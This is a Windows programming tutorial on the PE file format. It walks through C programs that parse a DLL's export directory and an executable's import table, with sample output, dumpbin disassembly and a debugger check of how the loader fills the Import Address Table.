The exported function of a dll can be called using the Win32 API. The API either takes name of the function or its ordinal number. This number is given after an @ following the name of the function. Normally using an ordinal number is not advisable as it may vary from one version of the dll to the other.

 

The function xyz is given an ordinal number of  5 followed by an ordinal number of 7 for the function aaa and 12 for bbb. If the ordinal number is not specified, the system chooses a default beginning with 1 and then increasing it sequentially.

 

The indentation is there for display purposes only; most def files indent the function name also.

 

The exported functions in a dll are placed in the exports section along with its location in the dll.

 

The program given below, displays the exports data in the file e.dll.

 

#include <windows.h>

#include <stdio.h>

#include <time.h>

void main()

{

int i;

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

hfile = CreateFile("e.dll",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("pmappedfile=%p\n",pmappedfile);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

PIMAGE_SECTION_HEADER psectionheader;

psectionheader = (PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

DWORD beginexportsrva,endexportsrva,diff,startoffile;

beginexportsrva = pimageoptionalheader->DataDirectory[0].VirtualAddress;

endexportsrva = beginexportsrva + pimageoptionalheader->DataDirectory[0].Size;

printf("beginexportsrva=%p Size=%x endexportsrva=%p\n",beginexportsrva,pimageoptionalheader->DataDirectory[0].Size,endexportsrva);

printf("Sec No Name     Virtual Address PointerToRawData VirtualSize\n");

for ( i=0; i < pimagefileheader->NumberOfSections; i++, psectionheader++ )

{

printf("%d      %6s   %x            %x                 %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);

if ( (beginexportsrva >= psectionheader->VirtualAddress) && (endexportsrva <= (psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))

break;

}

diff = (INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);

printf("diff=%d %x\n",diff,diff);

PIMAGE_EXPORT_DIRECTORY pexportdirectory;

startoffile = (DWORD)pmappedfile;

pexportdirectory = (PIMAGE_EXPORT_DIRECTORY)(startoffile + beginexportsrva - diff);

printf("pexportdirectory=%p\n",pexportdirectory);

char *nameoffile;

nameoffile  = (PSTR)(pexportdirectory->Name - diff + startoffile);

printf("FileName:%s %x\n", nameoffile,nameoffile);

printf("Characteristics:%08X\n", pexportdirectory->Characteristics);

printf("TimeDateStamp:%08X %s",pexportdirectory->TimeDateStamp,ctime((long *)&pexportdirectory->TimeDateStamp));

printf("Version Number:Major.Minor %u.%02u\n", pexportdirectory->MajorVersion,pexportdirectory->MinorVersion);

printf("Ordinal Numbers Starting From:%08X\n", pexportdirectory->Base);

printf("Number of functions:%08X\n", pexportdirectory->NumberOfFunctions);

printf("Number of Names:%08X\n", pexportdirectory->NumberOfNames);

printf("Address of functions array rva=%08x\n",pexportdirectory->AddressOfFunctions);

printf("Address of names array rva=%08x\n",pexportdirectory->AddressOfNames);

printf("Address of ordinals array rva=%08x\n",pexportdirectory->AddressOfNameOrdinals);

long *pfunctionsactual;

short *pordinalsactual;

pfunctionsactual = (long *)((int)pexportdirectory->AddressOfFunctions - diff + startoffile);

pordinalsactual  = (short *)((int)pexportdirectory->AddressOfNameOrdinals - diff + startoffile);

char **ppnamesactual;

ppnamesactual = (char  **)((int)pexportdirectory->AddressOfNames - diff + startoffile);

printf("\ni  Entry Pt  Ordn  Name\n");

for ( i=0; i < pexportdirectory->NumberOfFunctions; i++ )

{

DWORD startoffunctionsrva = pfunctionsactual[i];

DWORD j;

if ( startoffunctionsrva == 0 ) 

continue;  

printf("%d  %08X  %4u", i , startoffunctionsrva, i + pexportdirectory->Base );

for ( j=0; j < pexportdirectory->NumberOfNames; j++ )

if ( pordinalsactual[j] == i )

printf("  %s", ppnamesactual[j] - diff + startoffile);

if ( (startoffunctionsrva >= beginexportsrva) && (startoffunctionsrva <= endexportsrva) )

printf(" (forwarder -> %s)", startoffunctionsrva - diff + startoffile );

printf("\n");

}

printf("Array of Address of Functions\n");

for ( i = 0 ; i < pexportdirectory->NumberOfFunctions; i++)

printf("%d %08X\n",i,pfunctionsactual[i]);

printf("Array of NameOrdinals\n");

for ( i = 0 ; i < pexportdirectory->NumberOfNames; i++)

printf("%d %08X\n",i,pordinalsactual[i]);

printf("Names of functions\n");

for ( i = 0 ; i < pexportdirectory->NumberOfNames; i++)

printf("%d %08X %s\n",i,ppnamesactual[i] - diff + startoffile , ppnamesactual[i] - diff + startoffile);

}

 

pmappedfile=00310000

beginexportsrva=00004710 Size=80 endexportsrva=00004790

Sec No Name     Virtual Address PointerToRawData VirtualSize

0       .text   1000            1000                 275e

1      .rdata   4000            4000                 790

diff=0 0

pexportdirectory=00424710

FileName:e.dll 424776

Characteristics:00000000

TimeDateStamp:3FEBF2B2 Fri Dec 26 14:04:58 2003

Version Number:Major.Minor 0.00

Ordinal Numbers Starting From:00000005

Number of functions:00000008

Number of Names:00000005

Address of functions array rva=00004738

Address of names array rva=00004758

Address of ordinals array rva=0000476c

 

i  Entry Pt  Ordn  Name

0  0000100A     5  xyz

1  00001000     6  abc

2  0000100F     7  aaa

3  00001005     8  pqr

7  00001014    12  bbb

Array of Address of Functions

0 0000100A

1 00001000

2 0000100F

3 00001005

4 00000000

5 00000000

6 00000000

7 00001014

Array of NameOrdinals

0 00000002

1 00000001

2 00000007

3 00000003

4 00000000

Names of functions

0 0042477C aaa

1 00424780 abc

2 00424784 bbb

3 00424788 pqr

4 0042478C xyz

 

The above program displays the exports data section in the file e.dll.  The initial part of the program remains the same as before. Functions like CreateFile, CreateFileMapping and MapViewOfFile loads the dll e.dll in memory at memory location 310000. The start of a PE file contains a DOS header that gives the location of the PE header. After the characters P,E,0,0 comes the Image File header which is followed by the Image Optional header. The optional header is followed by the section headers. These headers have been explained earlier on except for the Optional header that has a series of   structures with two members Virtual Address and Virtual Size. The Virtual Address reports on the memory location of a particular set of data i.e. its RVA and the Size member gives its size.

 

The first structure of the Data Directory structure stores details on the exports information whereas the second one is on the imports data.  We will limit our learning to these two structures for the time being.

 

The first DataDirectory structure states that the exports section begins 4710 bytes from the start of the file and its size is 80 bytes. Thus in effect, export data takes up only 80 bytes. Also, 4710 is an RVA or an offset from the start of the file loaded in memory. Remember the file on disk in not loaded in memory in the same manner as the map functions. The file is broken up into sections and each section is loaded in memory depending upon the section header.

 

It is for this reason, that we now need to find out which section stores the exports data. The only way out is by iterating through the section header and checking the section that contains the RVA, which is 4710, the value stored in variable beginexportsrva. At the same time, the section details are also displayed again.

 

In the if statement we check if the variable beginexportsrva or the start of the exports rva is greater than or equal to the VirtualAddress field, i.e the start of the section in memory. The section also should be large enough to contain the export data. This is done by checking the end of the exports data which must be less than or equal to the VirtualAddress plus the size of the section.

 

The first section starts at an RVA of 1000 or 4096 bytes as the file starts with the PE header. Since the section alignment is 4096 bytes, each section starts at a multiple of 4096 irrespective of the size of the section data. The section called rdata starts at rva 0x4000 and has a size of 790 bytes, therefore it ends at 4790.  This value is less than or equal to endexportsrva which is the end of the exports data.

 

Since the if statement results in true for the second section, the loop is terminated with the details of the second section being stored in the psectionheader variable.

 

A variable called diff is computed to be zero in the case of e.dll but for dll’s like kernel32.dll it will have a different value which is 0xc00 as the exports data is found in the first section, loaded in memory at 0x1000. Also, the pointer to raw data has a value of 0x400.

 

Thus on the disk, the export section of kernel32 section will start at 0x400 from the start of the file but in memory when the actual loader loads it, the section will be loaded at 0x1000. As a result, since we are using the map functions to read the file, the value of diff must be subtracted to arrive at right rva. The rva’s are always with respect to the Virtual Address. The newer versions of the linkers give the rva and pointer to raw data the same value.

 

The variable startoffile is made equal to pmappedfile which has a value of 310000 and indicates the start of file in memory. Then the actual start of the exports directory pexportdirectory is computed. This is an rva and variable beginexportsrva is used which is calculated with the help of start of the file stored in variable startoffile minus the diff variable which for e.dll is zero. Thus the exports data is stored at memory location 00424710.

 

This data is represented in a structure that looks like Export Directory thus facilitating in the display of some of its members.

 

The first member is the name of the dll which is stored at memory location 424776. Then is a field called Characteristics whose present value is zero. This is followed by the date time stamp of a long datatype. This value can be converted to a string format using the function called ctime. This is followed by the major and minor version numbers which are also zero.

 

In the def file, the first function xyz is given an ordinal number 5, the function aaa an ordinal number of 7 and function bbb 12. The abc and pqr functions are not given any ordinal numbers.

 

Thus our ordinal number starting point is 5 and as we have not given the abc function a ordinal number it is given a value 6. The def file overrules everything and as the aaa function has a ordinal number 7, the pqr function is given a ordinal number of 8 and finally bbb 12.

 

Thus the def file decides the ordinal numbers and the functions that do not have ordinal numbers are given the ones in the middle. The Base member of the exports directory gives us the starting point of the ordinal numbers, in our case 5. The next two members Number of Functions and Number of names is normally the same.

 

The Number of functions member tells us how many functions are to be exported. The Number of names gives us the number of functions that are exported by name plus empty gaps. If you look at the def file for e.dll, the last function is given a ordinal number of 12 and the second last function pqr has a ordinal number of 8.

 

Thus the array NumberOfFunctions has to have 3 empty members to account for the ordinal number 9, 10 and 11 that have no functions. The Ordinal Number array has a many members as the last ordinal number minus the ordinal base. Thus if we change the last functions bbb’s ordinal number to 100, the Number of  functions will change to 96.

 

Each function that we export has three bits of information associated with it. The first is the rva of where the function starts in memory. Then its ordinal number and finally its name. Thus in the exports directory we have three arrays which store the above data.

 

These arrays are called the AddressOfFunctions, AddressOfNameOrdinals and finally the AddressOfNames. As we may have only five exported functions, the size of this array is 32 bytes as the other three members are zero to account for empty slots 9, 10 , 11. These three arrays are stored back to back.

 

The first array AddressOfNames starts 00004738, followed by the array of functions at 00004758 which is 32 bytes away. The third array starts 0000476c which is 20 bytes away as this array has only 5 names as we have five functions to be exported. Thus the three array sizes are not equal. 

 

Now as always we want to convert these numbers to our memory space and thus we create three new variables by adding startoffile and subtracting diff. We have to now display the details of the exported functions stored in these three arrays. We use the member NumberOfFunctions to decide how long the  loop iterates. We first check if the AddressOfFunctions  member is zero.

 

If yes we know that no such function exists and thus go back to start of the loop. Remember there are no functions for ordinal numbers 9, 10 and 11. These entries will have a value of zero. We display the address of the function and then the ordinal number. The loop variable I is added to the ordinal base to give us the ordinal number.

 

If this gets a little difficult we have also displayed at the end of the program the contents of the three arrays. The first array that gives us the address of the functions is decided by the last ordinal number minus the ordinal base which in our case works out to 12 – 5 or 8.

 

The missing ordinal numbers have a zero as the value. The first function has the ordinal number of the member Ordinal Base and the next function, a ordinal number that is increased by 1. Now starts the complication. The Name Ordinals array is not ordered at all and contains the same number of members as the address of names.

 

So if we want to find the name of a function with ordinal number 6 the function abc, we know that as it is the second function, the value of I is 1. The loop variable is the ordinal number + ordinal base. We thus scan the ordinal base array for a member whose value is 1 and not 6.

 

The values of the ordinal base array are not the ordinal numbers but ordinal numbers minus ordinal base. The offset in this Name Ordinal array  gives us the offset in the Names array.  Thus the system first stores the names of the functions in memory and the addresses of these names in the Name Address array.

 

Then it fills up the Name Ordinal array with the ordinals numbers corresponding with the names. Thus the first member of the Names array contains the address of aaa and the Name Ordinal array its ordinal number 7 – 5 or 2.  The last function in the Names array stores the address of xyz function and as its ordinal number is 5, the last member of the Name ordinal array has a value of 5 – 5 i.e. 0.

 

The Address of Function array is indexed on Ordinal Number minus ordinal base. If you have noticed the Names array is sorted on the name of the function. Thus we first read the address of the function, its index into the array is the ordinal number plus Ordinal Base. We then find a corresponding value in the Name Ordinal array. This index gives us the address of the name in the Address of Names array.

 

The Imports table.

 

d.c

#include <windows.h>

main()

{

MessageBox(0,"hi","bye",0);

MessageBox(0,"hi1","bye1",0);

GetDC(0);

ReleaseDC(0,0);

}

 

cl d.c user32.lib

 

Microsoft has given plenty of dlls from where code can be easily picked up when writing any code. However, this code does not physically get added to the exe file but instead, a list is maintained of all dlls’s along with the functions used from them. This list is called the imports section.

 

In the above exe file e.exe, three functions are called from the dll user32.dll. Lets now display the import data section stored in file e.exe.

 

b.cpp

#include <windows.h>

#include <stdio.h>

#include <time.h>

void main()

{

HANDLE hfile,hfile1;

int i;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("d.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

PIMAGE_SECTION_HEADER psectionheader;

psectionheader = (PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

DWORD importstartrva,importendrva;

importstartrva = pimageoptionalheader->DataDirectory[1].VirtualAddress;

importendrva = importstartrva + pimageoptionalheader->DataDirectory[1].Size;

printf("importstartrva=%x size=%x\n",importstartrva,pimageoptionalheader->DataDirectory[1].Size);

printf("Section No Name    Virtual Address PointerToRawData VirtualSize\n");

for ( i=0; i < pimagefileheader->NumberOfSections; i++, psectionheader++ )

{

printf("%2d         %-7s   %x            %x              %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);

if ( (importstartrva  >= psectionheader->VirtualAddress) && (importstartrva < (psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))

break;

}

DWORD diff,startoffile;

diff = (INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);

PIMAGE_IMPORT_DESCRIPTOR pimportDescriptor;

startoffile = (DWORD)pmappedfile;

pimportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(startoffile + importstartrva - diff);

printf("psectionheader=%x pimportDescriptor=%x\n",psectionheader , pimportDescriptor);

while ( 1 )

{

if ( (pimportDescriptor->TimeDateStamp==0 ) && (pimportDescriptor->Name==0) )

break;

printf("Name of Dll:%s\n", pimportDescriptor->Name -diff + startoffile );

printf("Characteristics:%08X (Unbound IAT)\n",pimportDescriptor->Characteristics);

printf("TimeDateStamp:%08X %s",pimportDescriptor->TimeDateStamp,ctime((PLONG)&pimportDescriptor->TimeDateStamp));

printf("ForwarderChain:%08X\n",pimportDescriptor->ForwarderChain);

printf("First thunk RVA:%08X\n",pimportDescriptor->FirstThunk);

PIMAGE_THUNK_DATA pthunkdata,pthunkdatafirst;

long *pFirstThunk;

pthunkdata = (PIMAGE_THUNK_DATA)pimportDescriptor->Characteristics;

pFirstThunk = (long *)pimportDescriptor->FirstThunk;

pthunkdatafirst = (PIMAGE_THUNK_DATA)pimportDescriptor->FirstThunk;

pthunkdatafirst = (PIMAGE_THUNK_DATA)((DWORD)pthunkdatafirst - diff + startoffile);

pthunkdata = (PIMAGE_THUNK_DATA)((DWORD)pthunkdata - diff + startoffile);

pFirstThunk = (long *)((DWORD)pFirstThunk - diff + startoffile);

if (!pthunkdata)

return;

printf("  Ordn  Name\n");

while ( 1 )

{

if ( pthunkdata->u1.AddressOfData == 0 )

break;

if ( pthunkdata->u1.Ordinal & IMAGE_ORDINAL_FLAG )

{

printf( "  %4u", IMAGE_ORDINAL(pthunkdata->u1.Ordinal) );

}

else

{

PIMAGE_IMPORT_BY_NAME pimportbyname;

pimportbyname = pthunkdata->u1.AddressOfData;

pimportbyname = (PIMAGE_IMPORT_BY_NAME)((DWORD)pimportbyname - diff + startoffile);

printf("  %4u  %s Memory=%x Value=%x", pimportbyname->Hint, pimportbyname->Name,pFirstThunk,*pFirstThunk);

}

if ( pimportDescriptor->TimeDateStamp )

printf( " (Bound to: %08X)", pthunkdatafirst->u1.Function );

printf( "\n" );

pthunkdata++;

pFirstThunk++;

}

pimportDescriptor++;

printf("\n");

}

}

 

Output

importstartrva=4404 size=3c

Section No Name    Virtual Address PointerToRawData VirtualSize

 0         .text     1000            1000              280e

 1         .rdata    4000            4000              778

psectionheader=4201e8 pimportDescriptor=424404

Name of Dll:USER32.dll

Characteristics:000044D0 (Unbound IAT)

TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970

ForwarderChain:00000000

First thunk RVA:00004090

  Ordn  Name

   515  ReleaseDC Memory=424090 Value=44e0

   446  MessageBoxA Memory=424094 Value=44f4

   253  GetDC Memory=424098 Value=44ec

 

Name of Dll:KERNEL32.dll

Characteristics:00004440 (Unbound IAT)

TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970

ForwarderChain:00000000

First thunk RVA:00004000

  Ordn  Name

   413  HeapDestroy Memory=424000 Value=4654

   411  HeapCreate Memory=424004 Value=4662

   342  GetStringTypeW Memory=424008 Value=4758

   339  GetStringTypeA Memory=42400c Value=4746

   202  GetCommandLineA Memory=424010 Value=450e

 

The first half of the program remains almost the same as in the exports program. Here, the 2nd member of the Data Directory contains the rva and the size of the imports section. The rva in our case is 4404 and its size 3c bytes.

 

The start and end of the imports data is placed in variables importstartrva and importendrva. The section that contains the imports data is the rdata section as before and the diff and startoffile variables as initialized in the same manner as before. Nothing changes. Thus the import data starts at location 424404.

 

The import data is made up of a series of structures called the Import Descriptor structures. There is one structure for each dll from where the code is imported. Also, every C program imports code from kernel32.dll due to the startup code added by the compiler. As a result, there are two such structures back to back in our import area, one for user32 and the other for kernel32.

 

The end of the import area is denoted by an Import Descriptor structure that has all its members zeroed out. Thus a while loop is implemented which exits when the members are all zero. Here the name and Date Time stamp field are checked to be zero for exit.

 

The Name of the dll is first displayed, however it is a rva and hence the startoffile is to be added and diff is to be subtracted like in the exports program. These variables are reset to their actual values as initially they are simply rvas and they point to what are called Image Thunk Data structures.

 

The Characteristics field that is not zero is printed along with the Date Time and the Forwarder Chain which is zero. The most crucial field is the field FirstThunk which is an rva having a value of 0x4090.

 

Now either the fields Characteristics or FirstThunk point to a series of structures that give the names of the functions imported from this dll. The variable pthunkdata is initialized to Characteristics and pthunkdatafirst to FirstThunk. Then again, it could so happen that pthunkdata i.e. field Characteristics is zero. If the pthunkdata member or Characteristics is zero the loop is terminated instantly.

 

Now to display the names of functions called from one dll the loop is brought in. The pthunkdata which represents the  Characteristics field is nothing but a pointer to a series of Image Thunk Data structures. Like the structures representing dll’s, an empty Thunk Data structure denotes the end of function names being called from this dll. Thus if the AddressOfData member is zero, the inner loop is terminated. The if statement is not true generally therefore in the else, the ordinal number and name are displayed in the else block. The AddressOfData member points to an Image Import by name structure. Since it is an rva its actual value is gathered and then two members Hint the ordinal number and the Name of the function are displayed. The variable pthunkdata is then incremented to point to the next structure. Once the inner while ends, the variable pimportDescriptor variable is incremented in the outer while to point to the next such structure.

 

The FirstThunk member in user32.dll has a value of 4090, again an rvc. The variable pFirstThunk, which is a pointer to a long, is set to this FirstThunk value after being converted to a actual memory location. We display the variable for each function called from the dll and also increment its value. The contents present in this memory are also displayed.

 

The imports data gives a listing of only the functions called from each dll. When we install Visual C++ we get a program called dumpbin that displays the internals of a PE file.

 

Run dumpbin on d.exe as dumpbin /DISASM d.exe. The DISASM option gives actually disassembles the code in our exe file.

 

  00401000: 55                 push        ebp

  00401001: 8B EC              mov         ebp,esp

  00401003: 6A 00              push        0

  00401005: 68 30 50 40 00     push        405030h

  0040100A: 68 34 50 40 00     push        405034h

  0040100F: 6A 00              push        0

  00401011: FF 15 94 40 40 00  call        dword ptr ds:[00404094h]

  00401017: 6A 00              push        0

  00401019: 68 38 50 40 00     push        405038h

  0040101E: 68 40 50 40 00     push        405040h

  00401023: 6A 00              push        0

  00401025: FF 15 94 40 40 00  call        dword ptr ds:[00404094h]

  0040102B: 6A 00              push        0

  0040102D: FF 15 98 40 40 00  call        dword ptr ds:[00404098h]

  00401033: 6A 00              push        0

  00401035: 6A 00              push        0

  00401037: FF 15 90 40 40 00  call        dword ptr ds:[00404090h]

  0040103D: 5D                 pop         ebp

  0040103E: C3                 ret

 

The first two calls are to the MessageBoxA function. The compiler/linker combo however is not informed of the address of the function MessageBoxA other than the fact that the library user32.lib has the functions name and its ordinal number.

 

The address of the function in the dll is not stored in the lib file. Even though the dll user32 is present on our machine and the exports section will contain the address of the function MessageBoxA, the linker does not bring in this address at all. Do remember that the dll need not be present on the machine the program is being linked on, the lib file suffices.

 

The functions address in the dll is an rva from where the dll is loaded in memory.  Thus to get at the real addresses, it is important to know the location of the dll in memory. Though, this information can be extracted by the linker, it does not for the simple reason that the exe file may be compiled on one machine and executed on another.

 

If that is the case, user32.dll may be loaded somewhere else in memory and thus the absolute addresses of the functions changes, even though its rva may be the same. Version to version of the dll may store the function at a different place. The placement of a dll in memory is decided by the operating system and it service pack. Thus it is the job of the runtime loader to figure out the address of the function in memory.

 

Thus the absolute addresses of the functions can never be determined. The second hurdle is that one function can be called many times in a program like the printf or the MessageBox. There is no way one would expect the loader to read the program code at runtime and replace every occurrence of the call to say the MessageBoxA function with the address of the function in memory on that machine. This would simply take too long.

 

Thus when a program is executed, the system does the normal sanity checks. In the disassembled code, the call to the MessageBoxA function is an indirect call. The system is directed to go to memory location 404094 and execute a function whose address is stored at that location.

 

When the import table is displayed, the FirstThunk member points to 404090, thus for MessageBoxA the value is 404094 as it is the second function. Thus to simplify matters for the loader, all that it does at runtime is, reads the import section.

 

The Characteristics member gives it the function name and ordinal number and the FirstThunk member gives it a corresponding memory location, which is assumed to contain the address of that function. Thus the loader figures out the address of MessageBoxA on a machine and places that address at memory location 404094.

 

Thus it needs to do this only once irrespective of the number of times the function is called. In the same vein at memory location 404090 stores the address of the function ReleaseDC and 404098 GetDC.

 

To confirm this we add a breakpoint interrupt in file d.c as follows.

 

d.c

#include <windows.h>

main()

{

int 3

MessageBox(0,"hi","bye",0);

MessageBox(0,"hi1","bye1",0);

GetDC(0);

ReleaseDC(0,0);

}

 

Running the above program transports us to the debugger. In the memory window, the memory location of 00404090 is given. The bytes shown are as follows.

 

Memory

00404090 7A 3A E1 77 

00404094  D5 75 E3 77

00404098 6C 3A E1 77

 

Now run the program f.c  which has the following.

 

f.c

#include <windows.h>

main()

{

printf("ReleaseDC=%x\n",ReleaseDC);

printf("MessageBox=%x\n",MessageBox);

printf("GetDC=%x\n",GetDC);

}

 

ReleaseDC=77e13a7a

MessageBox=77e375d5

GetDC=77e13a6c

 

This program discloses the address of the ReleaseDC function as 77e13a7a. At memory location 404090, the same value is stored but with the bytes in reverse order. The import table also shows the ReleaseDC function as its first member and the Disassembly shows the same value too. In the same vein the address of the MessageBoxA function is at 77e375d5 and it should be at location 404094. Ditto for GetDC.

 

Back to the main page